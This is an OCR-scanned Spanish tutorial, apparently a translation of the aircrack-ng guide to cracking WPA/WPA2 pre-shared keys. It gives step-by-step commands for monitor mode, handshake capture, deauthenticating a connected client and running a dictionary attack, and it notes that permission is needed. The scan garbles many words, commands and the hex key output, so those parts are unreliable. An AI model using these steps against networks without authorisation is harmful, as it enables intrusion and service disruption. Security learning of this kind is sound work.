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Introduccion 

Este manual trata sobre como obtener la clave WPAAVPA2 de ima red en la que se usa un sistema de clave compartida (pre-shared keys). Es 
recomendable leer y aprender como fiuiciona la encriptacion WPA/WPA2. En el Wiki rhttp://aircrack-m;.orgl puedes encontrar una seccion sobre 
WPA/WPA2 . 

WPA/WPA2 tiene soporte para otros tipos de autenticacion, ademas de clave compartida. Pero con aircrack-ng SOLO se puede intentar 
obtener claves pre-compartidas (pre-sliared keys). Por lo tanto asegiirate de que airodump-ng te dice que la autenticacion de la red es de tipo 
PSK, y en otro caso, ni intentes averiguarla. 

Hay otra diferencia importante entre crackear WPAAVPA2 y WEP. En las claves WEP, se pueden usar metodos “estaticos” de inyeccion para 
acelerar el proceso, pero para WPA/WPA2 solo se pueden utilizar tecnicas de fiierza bruta. Esto se debe a que la clave no es estatica, por lo que 
recogiendo IVs como para la encriptacion WEP, no conseguiremos obtener mas rapidamente la clave. Lo unico que se necesita para poder iniciar 
un ataque es el handshake entre el cliente y el AP. El handshake se genera en el momenta que el cliente se conecta a la red. Aunque no es 
exactamente cierto, para los propositos de este tutorial, diremos que si es verdad: La clave pre-compartida puede tener un tamano de 8 a 63 
caracteres, por lo que parece imposible crackear la clave. 

La unica forma de obtener la clave es utilizando un diccionario. De tal forma, que si quieres tener una red wireless segura en tu casa, debes usar 
una clave WPAAVPA2 de 63 caracteres, incluyendo en la misma simbolos especiales. 

El hecho de tener que usar fiierza bruta es un inconveniente muy grande. Porque se hace un uso intensivo del procesador del PC, y solo puede 
probar de 50 a 300 claves por segundo, dependiendo de la CPU. El proceso puede llevar horas o dias si se utiliza un diccionario grande. Si estas 
pensando en generar tu propio diccionario para incluir en el mismo todas las combinaciones posibles, echale un vistazo a este calculador de 
tieiupo: bmte force time calculator rhttp://lastbit.com/pswcalc.aspl . Quedaras sorprendido de la gran cantidad de tiempo que es necesaria. 

No hay ninguna diferencia entre el crackeo de redes WPA o WPA2. El metodo de autenticacion es basicamente el mismo. Por lo que las tecnicas 
a usar son identicas. 

Es recomendable que cada uno experimente con su propio punto de acceso wireless, para familiarizarse con estas ideas y tecnicas. Si no tienes un 
punto de acceso propio, recuerda que tienes que pedir penuiso al propietario del router con el que quieras practicar este ateque. 

Antes de nada hay que darles las gracias a los Desarrolladores de la suite Aircrack-ng rhttp://trac.aircrack-ng.oral por crear estas herramientas tan 
fantastieas. 

Por fevor, enviame cualquier sugerencia, positiva o negativa. Bien sean problemas o buenas ideas seran bienvenidas. 

Puntos de partida 

Suponemos que: 

• Estas usando drivers parcheados para inyeccion. Usa el injection test Para comprobar que tu tarjeta puede inyectar. 

• Estas fisicamente sufieientemente cerca para enviar y recibir paquetes del piuito de acceso. Recuerda que recibir paquetes del piuito de 
acceso no significa que los paquetes que transmitas sean recibidos por el AP. La fiierza de la serial de las tarjetas wireless generalmente es 
menor que la fiierza de la serial de los AP. Por lo tanto, es necesario estar cerca del AP, para que los paquetes que transmitimos sean 
recibidos por el AP. Deberias confirmar que te puedes comunicar con el AP siguiendo estas instrucciones . 

• Usamos la version 0.9 de aircrack-ng. Si usas otra version algunos comandos puede que se tengan que escribir de forma diferente. 
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Asegurate de que cumples todas las condiciones, sino no funcicnara. En los siguientes ejemplos, tendras que cambiar “athO” por el nombre de la 
interlace de tu tarjeta wireless. 

En los ejemplos, la option “guion doble bssid” se muestra como -bssid”. Acuerdate de borrar el espacb entre los dos guiones cnando lo 
utilices en la vida real. Esto tambien se aplica a -ivs”, -arpreplay”, -deauth”, -channel”, -arp” and -fekeauth”. 

Equipo usado 

Para segnir este manual en tu casa, debes tener dos tarjetas wireless. 

En este tutorial, a continuation puedes ver las que yo he usado: 

• DireccionMAC delPC ejecutando la suite aircrack-ng: 00:0F:B5:88:AC:82 

• DireccionMAC delcliente wireless usando WPA2: 00:0F:B5:FDFB:C2 

• BSSID (directionMAC delpunto de acceso): 00:14:6C:7E:40:80 

• ESSID (nombre de la red Wireless): teddy 

• Canal del AP: 9 

• Interface Wireless: athO 

Tienes que obtener la information equivalente de la red sobre la que quieres trabajar. Y cambiar estos valores en los siguientes ejemplos. 

Solucion 

Contenidos 

El objetivo es capturar el handshake WPA/WPA2 y usarlo con aircrack-ng para obtener la clave pre-compartida. 

Esto se puede hacer de forma activa o pasiva. “Activa” significa que podemos acelerar elproceso deautenticando a un cliente wireless. ‘Tasiva” 
significa que podemos esperar a que un cliente wireless se autentifique en la red WPAAVPA2. La ventaja de la forma pasiva es que no 
necesitamos inyectar y por lo tanto podremos utilizarla desde Windows. 

AquI estan los pasos que vamos a seguir: 

1. Colocar la interface wireless en modo monitor y especificar el canal del AP 

2. Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar el handshake 

3. Usar aireplay-ng para deautentificar a un cliente conectado 

4. Ejecutar aircrack-ng para obtener la clave pre-compartida usando ese handshake 

Paso 1 - Colocar la interface wireless en modo monitor y especificar el canal del AP 

El proposito de este paso es colocar la tarjeta en el modo denominado modo monitor. En este modo la tarjeta wireless puede escuchar y capturar 
cualquier paquete en el aire. En cambfo, en el modo normal la tarjeta solo “escuchara” los paquetes que van destinados a la misma. Escuchando 
todos los paquetes, podremos mas adelante capturar los 4 paquetes que forman el handshake WPAAVPA2. Y opcionalmente tambien podremos 
deautenticar a un cliente wireless. 

Primero para la interlace athO escribiendo: 

airmon-ng stop athO 
El sistema nos respondent: 

Interface Chipset Driver 

wifiO Atheros madwifi-ng 

athO Atheros madwifi-ng VAP (parent: wifiO) (VAP destroyed) 

Escribe “iwconfig” para comprobar que no hay mas interlaces athX. Deberas ver algo como esto: 


lo 

no 

wireless 

extensions 

ethO 

no 

wireless 

extensions 

wifiO 

no 

wireless 

extensions 
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Si queda alguna interlace athX, para cada una de ellas. Cnando termines, ejecuta “iwconfig” para verificar que ya no queda ninguna. 

Ahora, escribe el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 9: 

airmon-ng start wifiO 9 

Nota: En este comando nsamos “wifiO” en lugar de nuestra interlace “athO”. Esto se debe a que estamos usando los drivers madwifi-ng y no 
madwifi-old. 

El sistema nos respondera: 

Interface Chipset Driver 

wifiO Atheros madwifi-ng 

athO Atheros madwifi-ng VAP (parent: wifiO) (monitor mode enabled) 

Puedes observar que “athO” aparece colocada en modo monitor. 

Para confirmar que la interface esta bien configurada, escribimos “iwconfig”. 

El sistema nos respondera: 


no wireless extensions. 

no wireless extensions. 

no wireless extensions. 

IEEE 802.llg ESSID:"" Nickname:"" 

Mode:Monitor Frequency:2.452 GHz Access Point: 00:OF:B5:88:AC:82 
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 

Retry:off RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management:off 

Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm 
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 

Podemos ver que athO esta en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en “Access Point” vemos la direccion 
MAC de nuestra tarjeta wireless. Es importante comprobar toda esta information antes de continuar, ya que sino no fiincionara. 

Para ver la correspondence entre Irecuencia y canal, mira: 

http://www.cisco.com/en/US/docs/wireless/technologv/channel/deplovment/guide/Channel.htmftwpl34132 

Ihttp://www.cisco.com/en/US/docs/wireless/technology/channel/deplovment/guide/Channel.html#wp 1341321 . Asi obtendras la Irecuencia para cada 
canal. 

Paso 2 - Iniciar airodump-ng para capturar el handshake 

El proposito de este paso es ejecutar airodump-ng para capturar los 4 paquetes del handshake en el momento que un cliente se autentifica con el 
AP en el que estamos interesados. 

Escribe: 

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk athO 

Donde: 

• -c 9 es el canal de la red wireless 

• - -bssid 00:14:6C:7E:40:80 es la direccion MAC del AP. Esto elimina eltrafico de otras redes. 

• -w psk es el nombre del archivo en el que guardaremos los IVs. 

• athO es el nombre de nuestra interlace. 

Importante: NO uses la opcion ”- -ivs”. Debes capturar los paquetes enteros. 

A continuation puedes ver una imagen en la que se ve un cliente wireless conectado a la red: 

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 


lo 

wifiO 

ethO 

athO 
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BSSID 

PWR RXQ Beacons 

#Data, 

#/s 

CH MB 

ENC CIPHER 

AUTH 

ESSID 

00:14:6C:7E:40:80 

39 100 51 


116 

14 

9 54 

WPA2 CCMP 

PSK 

teddy 

BSSID 

STATION ] 

PWR 

Lost 

Packets 

Probes 



00:14:6C:7E:40:80 

00:OF:B5:FD:FB:C2 

35 


0 

116 




Y ahora una imagen de la red sin clientes conectados: 








CH 9 ][ Elapsed: 

4 s ][ 2007-03-24 17 

: 51 
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Paso 3 - Usar aireplay-ng para deautentificar a un cliente conectado 

Este paso es opcional. Solo es necesario realizar este paso si optas por acelerar activamente todo el proceso. El requisite necesario es que se 
encuentre asociado actualmente con el AP algiin cliente wireless. Si no hay ningiin cliente wireless asociado al AP, lee el siguiente paso del manual 
y ten paciencia. No es necesario decir, que si mas tarde aparece algiin cliente wireless, puedes volver atras y seguir este apartado del manual. 

Lo que se hace en este paso es enviar un mensaje al cliente wireless para desasociarlo con el AP. Entonces el cliente wireless se reautenticara con 
el AP. En la reautenticacion se generaran los 4 paquetes de autenticacion (handshake) en los que estamos interesados en capturar. Despues los 
usaremos para intentar obtener la clave precompartida WPAAVPA2. 

Prestando atencion a la salida del comando airodump-ng del paso anterior, podemos determinar el cliente que se encuentra conectado 
actualmente. Necesitamos su direccion MAC para el siguiente comando. Abre otra consola y escribe: 

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:OF:B5:FD:FB:C2 athO 

Donde: 

• -0 significa deautenticacion 

• 1 es el numero de deautenticaciones enviadas (puedes enviar infinitas si lo deseas) 

• -a 00:14:6C:7E:40:80 es la direccionMAC delpunto de acceso 

• -c 00:0F:B5:FDFB:C2 es la direccion MAC del cliente que queremos deautenticar 

• athO es el nombre de nuestra interlace 

A continuacion puedes ver la salida del comando: 

11:09:28 Sending DeAuth to station -- STMAC: [00:OF:B5:34:30:30] 

Con un poco de suerte esto causara que el cliente se tenga que reautentificar y capturaremos los 4 paquetes handshake. 

Problemas de uso 

• Los paquetes de deautenticacion se envian directamente desde el PC a los clientes. Por lo que se debe estar fisicamente cerca de los 
clientes wireless. 

Paso 4 - Ejecutar aircrack-ng para obtener la clave pre-compartida 

Elproposito de este paso es conseguir la clave WPAAVPA2 precompartida. Para hacer esto, se necesita un diccionario de posibles palabras. 
Basicamente, aircrack-ng comprueba cada una de esas palabras para mirar si coincide con la clave. 

Hay unpequeno diccionario que se incluye en la suite aircrack-ng - “password.1st”. En el Wiki FAQ puedes encontrar una larga lista de diferentes 
diccionarios. Se puede usar John the Ripper rhttp://www.openwall.com/iohn/l (JTR) para construir un diccionario propio y despues usarlo con 
aircrack-ng . 

Abre otra consola y escribe: 

aircrack-ng -w password.1st -b 00:14:6C:7E:40:80 psk*.cap 
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Donde: 

• -w password.1st es el nombre del archivo del diccionario. Recuerda que tienes que especificar la ruta completa del archivo si no se 
encuentra en el mismo directorio. 

• *.cap es el nombre del grupo de archivos que contienen los paquetes capturados. Date cuenta que en este caso usamos el comodin * para 
incluir varios archivos. 

Esta es la salida cuando no se encontro ningun handshake: 

Opening psk-Ol.cap 
Opening psk-02.cap 
Opening psk-03.cap 
Opening psk-04.cap 
Read 1827 packets. 

No valid WPA handshakes found. 


Cuando ocurre esto tienes que volver alpaso 3 (deautenticar al cliente wireless) o esperar mas tiempo para ver si se conecta algiin cliente y se 
autentifica al AP. 

Esta es la salida cuando se encuentra algiin handshake: 

Opening psk-Ol.cap 
Opening psk-02.cap 
Opening psk-03.cap 
Opening psk-04.cap 
Read 1827 packets. 

# BSSID ESSID Encryption 

1 00:14:6C:7E:40:80 teddy WPA (1 handshake) 

Choosing first network as target. 

En este punto, aircrack-ng intentara encontrar la clave. Dependiendo de la velocidad de la CPU y del tamano del diccionario, este proceso puede 
llevar bastante tiempo, incluso dias. 

A continuacion puedes ver que ocurre cuando averigua la clave precompartida: 

Aircrack-ng 0.8 

[00:00:00] 2 keys tested (37.20 k/s) 

KEY FOUND! [ 12345678 ] 


Master Key 

: CD 

69 

0D 

11 

8E 

AC 

AA 

C5 

C5 

EC 

BB 

59 

85 

7D 

49 

3E 


B8 

A6 

13 

C5 

4A 

72 

82 

38 

ED 

C3 

7E 

2C 

59 

5E 

AB 

FD 

Transcient Key : 

: 06 

F8 

BB 

F3 

B1 

55 

AE 

EE 

IF 

66 

AE 

51 

IF 

F8 

12 

98 


CE 

8A 

9D 

A0 

FC 

ED 

A6 

DE 

70 

84 

BA 

90 

83 

7E 

CD 

40 


FF 

ID 

41 

El 

65 

17 

93 

0E 

64 

32 

BF 

25 

50 

D5 

4A 

5E 


2B 

20 

90 

8C 

EA 

32 

15 

A6 

26 

62 

93 

27 

66 

66 

E0 

71 

EAPOL HMAC 

: 4E 

27 

D9 

5B 

00 

91 

53 

57 

CO 

CO 

9C 

66 

C8 

B1 

29 

D1 

CB 
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